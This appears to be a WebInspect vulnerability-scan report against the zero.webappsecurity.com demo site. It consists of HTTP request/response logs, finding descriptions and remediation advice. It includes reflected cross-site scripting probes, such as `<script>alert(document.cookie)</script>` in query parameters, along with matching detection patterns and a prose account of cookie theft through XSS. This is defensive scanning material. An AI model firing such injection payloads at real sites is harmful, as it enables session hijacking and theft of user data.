</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /banklogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:16 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 247
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
Please specify the name of Forté service and page.<br>
<b>Usage:</b> http://web_server_name/cgi_directory_name/fortecgi?serviceName=Forté_service_name&pageName=request_page&other_info
<br>
<br>
<b>Forte WebEnterprise Version WE.1.0.E.0</b>
Non Persistent CookiesCookies are small bits of data that are sent by the web
application but stored locally in the browser. This lets the application
use the cookie to pass information between pages and store variable
information. The web application controls what information is stored in a
cookie and how it is used. Typical types of information stored in cookies
are session Identifiers, personalization and customization information, and
in rare cases even usernames to enable automated logins. <br><br>There are
two different types of cookies: <i>session cookies</i> and <i>persistent
cookies</i>. Session cookies just live In the browser's memory, and are not
stored anywhere. Persistent cookies, however are stored on the browser's
hard drive. This can cause security and privacy issues depending on the
information stored in the cookie and how it is accessed.Remove all 'Expires=' tags from cookies, and ensure
that any COTS software being used does not use the tag (and thus use
persistent cookies). In the case of COTS, it may be necessary to write
custom code that capture the set-cookie statement coming from the COTS and
modifies it to a compliant state.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
GET /banklogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:16 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 247
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
Please specify the name of Forté service and page.<br>
<b>Usage:</b> http://web_server_name/cgi_directory_name/fortecgi?serviceName=Forté_service_name&pageName=request_page&other_info
<br>
<br>
<b>Forte WebEnterprise Version WE.1.0.E.0</b>
IIS Permissions AssessmentIt is possible to determine the permissions that have been set on directories on IIS servers using specifically crafted requests.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=>"><script>alert('XSS')</script>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=<attack>>"><script>alert('XSS')</script></attack>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=--><script>alert('XSS')</script>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=<attack>--><script>alert('XSS')</script></attack>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>GET /forgot2.asp?msg2=no&msg=test@<script>alert(document.cookie)</script>.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1862
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center">test@<script>alert(document.cookie)</script>.com</td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?msg2=no&msg=<attack>test@<script>alert(document.cookie)</script>.com</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/forgot1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)GET /admin/help.cgi HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Connection: closed
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 17:02:31 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:46:59 GMT
ETag: "a43861f7a9dc11:8f6"
Content-Length: 46
<HTML></HTML>bleh exploit :0:0:
[boot loader]Admin Section Require AuthenticationThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires authentication before allowing access. Webinspect has detected that the URL <b> ~FullURL~ </b>has failed this policy.Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password
protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Connection: closed
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /login/login.asp?Action=Login&UserName=333%2D333%2D3333test@test999.com&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:48 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 351
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: 333-333-3333test@test999.com</h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
User supplied data without POSTThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires any query string be reported as bad behavior. This also should require that the user send everything through a POST request. Webinspect has detected that the URL<B> ~FullURL~ </b>has failed this policy.GET <var name="path"/>?Action=Login&UserName=333%2D333%2D3333test@test999.com&Password=333%2D333%2D3333test@test999.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/><var name="path"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
GET /login/login.asp?Action=Login&UserName=333%2D333%2D3333test@test999.com&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:48 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 351
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: 333-333-3333test@test999.com</h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
Hidden Form ValueThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires that hidden form fields are checked. Webinspect has detected that the URL <B> ~FullURL~ </b>has failed this policy.GET <var name="path"/>?Action=Login&UserName=333%2D333%2D3333test@test999.com&Password=333%2D333%2D3333test@test999.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/><var name="path"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
GET /login/login.asp?Action=Login&UserName=333%2D333%2D3333test@test999.com&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:48 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 351
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: 333-333-3333test@test999.com</h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
Possible Login FormA possible login form was found.GET <var name="path"/>?Action=Login&UserName=333%2D333%2D3333test@test999.com&Password=333%2D333%2D3333test@test999.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/><var name="path"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
type=['"]?password['"]?GET /error.html HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:18 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:19 GMT
ETag: "45f49c1a8dc11:8f6"
Content-Length: 125
<html>
<body>
Error Diagnostic Information<br><br>
<A href="/default.asp">The welcome page</A><br>
<br>
</body>
</html>ColdFusion Error MessageA possible ColdFusion error was detected. ColdFusion releases a lot of sensitive information in their error messages.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
Error\sDiagnostic\sInformationPOST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 48
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
